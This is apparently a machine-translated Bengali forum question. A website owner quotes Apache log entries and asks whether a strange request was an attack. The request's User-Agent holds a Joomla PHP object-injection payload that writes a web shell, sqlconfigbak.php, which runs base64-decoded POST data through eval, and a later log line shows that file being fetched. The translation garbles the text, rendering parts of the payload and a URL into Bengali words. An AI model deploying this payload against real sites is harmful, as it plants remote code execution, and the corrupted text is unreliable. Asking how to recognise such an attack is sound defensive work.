আমার সাইটে অ্যাপাচি অ্যাক্সেস লগ এন্ট্রি সাধারণত এই জাতীয়:
207.46.13.174 - - [31 / অক্টোবর / 2016: 10: 18: 55 +0100] "জিইটি / যোগাযোগ করুন HTTP / 1.1" 200 256 "-" "মজিলা / 5.0 (সামঞ্জস্যপূর্ণ; বিংবট / 2.0; + http: // www .be.com.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607
যাতে আপনি সেখানে ব্যবহারকারী-এজেন্ট ক্ষেত্রটি দেখতে পারেন। তবে আজ আমি ব্যবহারকারীর এজেন্ট ক্ষেত্রটি এর মতো ব্যবহার করতে পেলাম:
62.210.162.42 - - [31 / অক্টোবর / 2016: 11: 24: 19 +0100] "জিইটি / এইচটিটিপি / 1.1" 200 399 "-" "} __ পরীক্ষা | ও: 21:" জেডিটাবেসড্রাইভারমাইস্ক্লি ": 3: {এস: 2 : "এফসি"; হে: 17: "JSimplepieFactory": 0: {} গুলি: 21: "\ 0 \ 0 \ 0disconnectHandlers"; একটি: 1: {I: 0; একটি: 2: {I: 0; হে: 9: "SimplePie": 5: {গুলি: 8: "নির্বিষ"; হে: 20: "JDatabaseDriverMysql": 0: {} গুলি: 8: "FEED_URL"; s: 242: "file_put_contents ($: _ সার্ভার [" DOCUMENT_ROOT " ] .chr (47)। "sqlconfigbak.php", "| = | \ x3C" .chr (63)। "পিএইচপি \ এক্স 24 মমজজ = \ x24_POST ['জেড']; যদি (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST [ 'z0']); @ Eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); প্রস্থান;"; র: 19: " cache_name_function "; গুলি: 6:" জাহির "; গুলি: 5:" ক্যাশে "; খ: 1; র: 11:" cache_class "; হে: 20:"জেডিটাবেসড্রাইভার মাইএসকিএল ": 0: {}} আই: 1; এস: 4:" আরআইবি ";}} এস: 13:" \ 0 \ 0 \ 0 সংযোগ "; বি: 1;} ~ Ů" 0.304 বিপাইএসএস 10.10.36.125:104 0,304
এটি কি আক্রমণ ছিল? পরবর্তী লগ এন্ট্রি sqlconfigbak.phpস্ক্রিপ্টে উল্লিখিত ফাইলটি সফলভাবে পুনরুদ্ধার (কোড 200) পেয়েছে বলে মনে হচ্ছে । যদিও আমি ফাইল সিস্টেমে ফাইলটি খুঁজে পাই না:
62.210.162.42 - - [31 / অক্টোবর / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "মজিলা "
দয়া করে এখানে কি ঘটছিল?